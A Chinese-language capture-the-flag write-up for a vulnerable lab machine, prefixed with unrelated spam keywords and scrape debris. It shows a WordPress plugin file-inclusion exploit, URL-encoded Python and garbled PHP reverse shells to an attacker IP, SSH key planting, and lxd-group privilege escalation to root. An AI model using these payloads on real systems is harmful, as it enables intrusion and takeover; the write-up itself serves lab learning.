重庆自适应网站建设,wordpress添加icon文件,wordpress多用户模板,传智播客培训机构官网前言
这个靶机有亿点难,收获很多。打靶的时候#xff0c;前面很顺#xff0c;到创建ssh公钥之后就一点不会了。
1
01
arp扫描#xff0c;发现有一个130#xff0c;再查看端口 有22#xff0c;80#xff0c;129#xff0c;445#xff0c;10123 dirb扫描目录 这…前言
这个靶机有亿点难,收获很多。打靶的时候前面很顺到创建ssh公钥之后就一点不会了。
1
01
arp扫描发现有一个130再查看端口 有228012944510123 dirb扫描目录 这里的something里面有一个jarves应该是用户名称 继续找发现upload里有cmd应该是利用这里上传shell
02
/wp有一个wordpress去搜索知道是一个平台我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞不知道怎么利用看wp要利用这里的https://www.exploit-db.com/exploits/46537/ 打开后找到这一行 发现用户jarves
/server里有一个zip去搜索了知道这是gila cms没什么用处 初步信息收集完成
2
再进行上传shell操作因为上文提到的php文件我这里用php提权 php -r ‘$sockfsockopen(“47.192.168.157.128”,2333);exec(“/bin/sh -i 3 3 23”);’ 我这里失败了换python试试 192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxActiongetIdscfg…/…/…/…/…/…/…/…/…/…/home/jarves/upload/shell.phpcmdpython3%20-c%20%27import%20socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);psubprocess.call([%22/bin/sh%22,%22-i%22]);%27 再升级shell
去home目录查看信息有jarves tmp里没有东西可以利用 查看/varvar目录的详细信息
查看/var/www 找到root的密码root 我这里想去ssh连接发现密码不对
3
剩下的步骤基本是看wp 要先用两个工具smbclient和enum4linux 再创建ssh公钥 将id_rsa.pub复制到tmp目录下命名位authorized_keys 将authorized_keys上传到目标主机的.ssh目录下
然后使用ssh登录到目标主机
4
发现jarves还属于lxd组
从github下载构建好的Alpine,然后进行执行 接着我们将生成的文件上传至目标机器 wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz 接着我们使用lxd进行初始化 lxd init 导入镜像 lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage 进入到容器的命令行 lxc init myimage ignite -c security.privilegedtrue lxc config device add ignite mydevice disk source/ path/mnt/root recursivetrue lxc start ignite lxc exec ignite /bin/sh 替换mnt/root目录下的authorized_keys文件
最后使用ssh连接拿到root权限
